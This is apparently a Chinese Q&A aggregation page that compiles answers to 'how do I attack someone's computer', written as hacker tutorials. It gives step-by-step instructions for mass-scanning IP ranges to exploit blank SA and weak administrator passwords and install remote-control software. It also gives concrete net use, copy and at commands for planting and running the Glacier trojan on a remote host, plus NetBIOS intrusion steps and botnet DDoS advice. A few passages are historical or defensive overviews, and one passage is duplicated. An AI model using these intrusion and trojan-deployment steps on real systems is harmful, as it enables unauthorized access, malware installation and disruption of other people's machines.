當前位置:成語大全網 - 成語詞典 - 怎麽攻擊電腦?

怎麽攻擊電腦?

問題壹:如何攻擊別人的電腦 教妳如何遠程攻擊別人的電腦(黑客教程)

1,傻瓜級入侵

之所以說這是傻瓜級,因為這個方法完全不用動腦子,並且保守的說,照這個方法,兩個小時內肯定至少能入侵3臺電腦!3臺絕對是保守的數目!

需要軟件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(簡稱RA) 3389登陸器(xp自帶的有,要是xp,就不要下載了,就是開始-所有程序-附件-通訊-遠程桌面連接

不知道在哪下?用百度搜!我最不喜歡的就是當在群裏我告訴別人用什麽軟件後,他還喋喋不休的問我在哪下?把地址給我吧,太懶了吧,難道下載地址在我腦子裏?我不也是要搜嗎?

好了,下邊我們開始入侵了,下邊就是過程:

第壹步. 打開WinntAutoAttack,就是那個手雷的標誌,在起始ip裏和目標ip裏填上壹個ip段,並且盡量把範圍搞大點,比如在起始ip裏填218.88.1.1,在目標ip裏填218.88.255.255.ip段建議下壹個顯ip的qq,參考妳qq上好友的ip去填.中獎概率更大!勾上僅對ping檢查成功的機器進行檢測,檢測3389端口和收集netbios信息

在IIS溢出選項卡裏勾上開99端口shell,這個是用來開99端口telnet的,要是妳不會用telnet,這個就不要勾了. 在簡單管理員密碼選項卡裏勾上列出所有密碼簡單的管理帳號和上傳並安裝遠程圖形控制軟件. 在sql漏洞選項卡裏也壹樣,就是把三個框都打上勾,就是列出密碼為空的sa帳號建立系統管理員帳號(shanlu)和上傳並安裝遠程圖形控制軟件.

好了,連上網(妳不會連網都沒連吧?)根據妳機器的性能,把線程調下,就是拖那個小滑塊,越往右線程越大,要是妳的機器性能不好,太大的線程會死機的!我的機器性能不錯,我才用110左右的線程,並且有的時候我也會死機... ...(哭... ...)

ok!壹切就緒!點開始 . 接下來,接下來我們幹什麽呢?在qq上聊天吧,等結果吧

第二步. 時間很快就過去了,過了半個小時了吧,我們看看有沒有什麽結果,點信息,把上邊的廢話框內容往下拉

主機:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口開放。

SQL漏洞:

sa帳號密碼為空。

建立系統管理員帳號shanlu()成功

哈哈,有肉雞了,這個是3389的肉雞,我們用3389的登陸器登陸上去,填上他的ip,用戶名是shanlu,密碼是空,他的機器就展現在我們面前了!

要是有這樣的提示:

主機:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口開放。

簡......>>

問題二:知道對方的IP,如何攻擊對方的電腦? 1.取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第壹行是對方電腦名稱 第二行是對方電腦所在工作組 第三行是對方電腦的說明4.在Windows目錄下有壹文件供為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名5.開DOS窗口鍵入 NBTSTAT -R6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入。以上方法請不要亂用,本人對妳用上面的方法所惹出的麻煩概不負責,請慎重。 對付上面進攻的最好辦法就是隱藏妳的IP地址。

問題三:怎麽攻擊別人的電腦 攻擊別人電腦不是那麽好弄的 而且不知道妳的意思是攻擊別人的電腦 還是要入侵別人的電腦?如果攻擊別人的電腦 那麽首先妳是需要有大量的肉雞 壹臺電腦相當於壹臺肉雞 用遠控來上線 之後查到對方的IP地址 看看是否能PING通 然後用大量肉雞裏的流量去攻擊對方電腦 輕者可使對方電腦網速變慢、死機,重者完全可以損壞對方的電腦。不過要有大量肉雞是很不容易的 需要有壹個免殺的木馬才可以。如果要是入侵對方的電腦 這個更麻煩 查到對方IP 然後還需要掃描對方電腦的弱口令 進行猜解等等 壹般對方電腦如果開啟1433、3389、135等這些高危端口 也是比較容易入侵的 不過我說的這兩種是很麻煩的 還是建議妳不要考慮這些了

問題四:怎麽用CMD攻擊個人電腦? 64132是端口號

搞小破壞方法不建議使用,如果想開個玩笑,去下載個掃描工具,針對IP看有什麽漏洞,然後根據具體漏洞實施入侵(具體就不詳細說了,免得帶壞妳呵呵)取得ADMIN帳戶就可以為所欲為了

問題五:怎麽攻擊別人電腦 這又何苦這樣

提起黑客,總是那麽神秘莫測。在人們眼中,黑客是壹群聰明絕頂,精力旺盛的年輕人,壹門心思地破譯各種密碼,以便偷偷地、未經允許地打入 *** 、企業或他人的計算機系統,窺視他人的隱私。那麽,什麽是黑客呢?

黑客(hacker),源於英語動詞hack,意為“劈,砍”,引申為“幹了壹件非常漂亮的工作”。在早期麻省理工學院的校園俚語中,“黑客”則有“惡作劇”之意,尤指手法巧妙、技術高明的惡作劇。在日本《新黑客詞典》中,對黑客的定義是“喜歡探索軟件程序奧秘,並從中增長了其個人才幹的人。他們不象絕大多數電腦使用者那樣,只規規矩矩地了解別人指定了解的狹小部分知識。”由這些定義中,我們還看不出太貶義的意味。他們通常具有硬件和軟件的高級知識,並有能力通過創新的方法剖析系統。“黑客”能使更多的網絡趨於完善和安全,他們以保護網絡為目的,而以不正當侵入為手段找出網絡漏洞。

另壹種入侵者是那些利用網絡漏洞破壞網絡的人。他們往往做壹些重復的工作(如用暴力法破解口令),他們也具備廣泛的電腦知識,但與黑客不同的是他們以破壞為目的。這些群體成為“駭客”。當然還有壹種人兼於黑客與入侵者之間。

壹般認為,黑客起源於50年代麻省理工學院的實驗室中,他們精力充沛,熱衷於解決難題。60、70年代,“黑客”壹詞極富褒義,用於指代那些獨立思考、奉公守法的計算機迷,他們智力超群,對電腦全身心投入,從事黑客活動意味著對計算機的最大潛力進行智力上的自由探索,為電腦技術的發展做出了巨大貢獻。正是這些黑客,倡導了壹場個人計算機革命,倡導了現行的計算機開放式體系結構,打破了以往計算機技術只掌握在少數人手裏的局面,開了個人計算機的先河,提出了“計算機為人民所用”的觀點,他們是電腦發展史上的英雄。現在黑客使用的侵入計算機系統的基本技巧,例如破解口令(password cracking),開天窗(trapdoor),走後門(backdoor),安放特洛伊木馬(Trojan horse)等,都是在這壹時期發明的。從事黑客活動的經歷,成為後來許多計算機業巨子簡歷上不可或缺的壹部分。例如,蘋果公司創始人之壹喬布斯就是壹個典型的例子。

在60年代,計算機的使用還遠未普及,還沒有多少存儲重要信息的數據庫,也談不上黑客對數據的非法拷貝等問題。到了80、90年代,計算機越來越重要,大型數據庫也越來越多,同時,信息越來越集中在少數人的手裏。這樣壹場新時期的“圈地運動”引起了黑客們的極大反感。黑客認為,信息應***享而不應被少數人所壟斷,於是將註意力轉移到涉及各種機密的信息數據庫上。而這時,電腦化空間已私有化,成為個人擁有的財產,社會不能再對黑客行為放任不管,而必須采取行動,利用法律等手段來進行控制。黑客活動受到了空前的打擊。

但是, *** 和公司的管理者現在越來越多地要求黑客傳授給他們有關電腦安全的知識。許多公司和 *** 機構已經邀請黑客為他們檢驗系統的安全性,甚至還請他們設計新的保安規程。在兩名黑客連續發現網景公司設計的信用卡購物程序的缺陷並向商界發出公告之後,網景修正了缺陷並宣布舉辦名為“網景缺陷大獎賽”的競賽,那些發現和找到該公司產品中安全漏洞的黑客可獲1000美元獎金。無疑黑客正在對電腦防護技術的發展作出貢獻。

2,黑客攻擊

壹些黑客往往回采取壹些幾種方法,但是我很想說的是,壹個優秀的黑客絕不會隨便攻擊別人的。

1)、獲取口令

這又有三種方法:壹是通過網絡監聽非法得到用戶口令,這類方法有壹定的局限性,但危害性極大,監聽者往往能夠獲得其所在網段的所有用戶......>>

問題六:如何在自己電腦上攻擊他人電腦? 其實攻擊別人的電腦不是最讓人頭痛的辦法,要是***同的網線,就下載壹個P2P終結者軟件,控制他的流量,急死他! 下面是如何攻擊別人電腦,給妳壹個網址,妳自己可以去學壹學,上面有很多方法的hi.baidu/...a (壹):shed.exe

(二)流光2000

(三)cmd.exe (其實就是2000下的dos啦)!

(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 “shed.exe”:其實就是用來網上查***享資源的,速度快,可以查到很多服務斷的***項文件,不過在這裏面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!壹些作網站,網吧的服務器壹些目錄都是***享的,有些是可以訪問,但是不能刪除,因為妳所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! “流光”雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立壹個空對話,查到用戶列表,然後先簡單探測,此時有些網管懶惰,把administrator設置的過於簡單,呵呵,妳就可以抓到了。

下壹步如何做呢?也許在妳查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! “冰河”,想必許多朋友都玩過,使用冰河控制壹臺服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳並且控制他呢? “cmd.exe” 是2000下的dos了,執行cmd.exe 使用net命令,

具體操作如下:

第壹步:net use \\ip\ipc$ “password” /user:”user” 說明:以壹個超級用戶名與妳想黑的網站建立聯接,當然超級用戶必須是該網站admin裏的。這裏的”ip”就是主機了,“password”就是超級用戶的密碼,“user”就是超級用戶。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie

第二步:copy g-server.exe \\ip\admin$\system32 說明:g-server.exe就是冰河的遠程服務器端。意義:將此文件拷貝到對方的主機winnt裏的system32目錄裏。也許有人要問木馬侵入對方那邊可以察覺出來的吧,呵呵!裝了防火墻估計可以,不過很多主機沒錢買呀!不像中國盜版滿天飛!如果妳有最新的木馬也可以的!這是最好的了!!嘿嘿……

第三步:net time \\ip 察看對方的服務器時間。由於有時差,應該是壹個小時吧!所以必須要以對方的服務器時間為準。

第四步:at \\ip time g-server.exe 這裏的time就是對方的主機時間。作用:在規定時間執行該程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個我就不說了吧,呵呵!菜鳥也會......>>

問題七:怎樣攻擊別人的電腦、或者是系統。 知道對方的IP,然後用攻擊軟件進行攻擊,具體的方法就不是壹二天能學會的了,也不是壹句話兩句話能說清楚的,就這樣壹個單純的攻擊就可以寫壹本書。

問題八:知道對方電腦的IP地址,怎麽對其進行攻擊他的電腦 知道對方IP入侵別人的電腦

黑客已經成為壹種文化,很多人想成為黑客,他們偶爾學到了幾種小花招,總喜歡拿別人開玩笑,搞些惡作劇。其實黑客的最高境界在於防守,不在於進攻。所謂明槍易躲暗箭難防,要防住他人所有的進攻,肯定需要懂得比對方更多的系統知識,了解更多的系統漏洞,及如何彌補漏洞。現在滿天都是黑客教程,但真正有用的不多,下面介紹壹種WIN9X下的入侵方法: 1.取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。 2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。 3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第壹行是對方電腦名稱 第二行是對方電腦所在工作組第三行是對方電腦的說明 4.在Windows目錄下有壹文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名 5.開DOS窗口鍵入 NBTSTAT -R 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入。以上方法請不要亂用,本人對妳用上面的方法所惹出的麻煩概不負責,請慎重。 對付上面進攻的最好辦法就是隱藏妳的IP地址。註釋掉的------>

黑客已經成為壹種文化,很多人想成為黑客,他們偶爾學到了幾種小花招,總喜歡拿別人開玩笑,搞些惡作劇。其實黑客的最高境界在於防守,不在於進攻。所謂明槍易躲暗箭難防,要防住他人所有的進攻,肯定需要懂得比對方更多的系統知識,了解更多的系統漏洞,及如何彌補漏洞。現在滿天都是黑客教程,但真正有用的不多,下面介紹壹種WIN9X下的入侵方法: 1.取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。 2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。 3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第壹行是對方電腦名稱 第二行是對方電腦所在工作組第三行是對方電腦的說明 4.在Windows目錄下有壹文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名 5.開DOS窗口鍵入 NBTSTAT -R 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入。以上方法請不要亂用,本人對妳用上面的方法所惹出的麻煩概不負責,請慎重。 對付上面進攻的最好辦法就是隱藏妳的IP地址

hackant/?u=11714

問題九:黑客是如何攻擊別人的電腦的? 黑客常常利用電子郵件系統的漏洞,結合簡單的工具就能達到攻擊目的。壹同走進黑客的全程攻擊,了解電子郵件正在面臨的威脅和挑戰……毫無疑問,電子郵件是當今世界上使用最頻繁的商務通信工具,據可靠統計顯示,目前全球每天的電子郵件發送量已超過500億條,預計到2008年該數字將增長壹倍。電子郵件的持續升溫使之成為那些企圖進行破壞的人所日益關註的目標。如今,黑客和病毒撰寫者不斷開發新的和有創造性的方法,以期戰勝安全系統中的改進措施。出自郵件系統的漏洞典型的互聯網通信協議――TCP和UDP,其開放性常常引來黑客的攻擊。而IP地址的脆弱性,也給黑客的偽造提供了可能,從而泄露遠程服務器的資源信息。防火墻只控制基於網絡的連接,通常不對通過標準電子郵件端口(25端口)的通信進行詳細審查。壹旦企業選擇了某壹郵件服務器,它基本上就會壹直使用該品牌,因為主要的服務器平臺之間不具互操作性。以下分別概述了黑客圈中壹些廣為人知的漏洞,並闡釋了黑客利用這些安全漏洞的方式。壹、IMAP 和 POP 漏洞密碼脆弱是這些協議的常見弱點。各種IMAP和POP服務還容易受到如緩沖區溢出等類型的攻擊。二、拒絕服務(DoS)攻擊1.死亡之Ping――發送壹個無效數據片段,該片段始於包結尾之前,但止於包結尾之後。2.同步攻擊――極快地發送TCP SYN包(它會啟動連接),使受攻擊的機器耗盡系統資源,進而中斷合法連接。3.循環――發送壹個帶有完全相同的源/目的地址/端口的偽造SYN包,使系統陷入壹個試圖完成TCP連接的無限循環中。三、系統配置漏洞企業系統配置中的漏洞可以分為以下幾類:1.默認配置――大多數系統在交付給客戶時都設置了易於使用的默認配置,被黑客盜用變得輕松。2.空的/默認根密碼――許多機器都配置了空的或默認的根/管理員密碼,並且其數量多得驚人。3.漏洞創建――幾乎所有程序都可以配置為在不安全模式下運行,這會在系統上留下不必要的漏洞。面說說吧,希望妳能從中領略壹些道理.

問題十:電腦被攻擊了,怎麽辦 安裝殺毒軟件和防火墻,拒絕攻擊即可。

DoS是Denial of Service的簡稱,即拒絕服務,造成DoS的攻擊行為被稱為DoS攻擊,其目的是使計算機或網絡無法提供正常的服務。最常見的DoS攻擊有計算機網絡帶寬攻擊和連駭性攻擊。帶寬攻擊指以極大的通信量沖擊網絡,使得所有可用網絡資源都被消耗殆盡,最後導致合法的用戶請求就無法通過。連通性攻擊指用大量的連接請求沖擊計算機,使得所有可用的操作系統資源都被消耗殆盡,最終計算機無法再處理合法用戶的請求。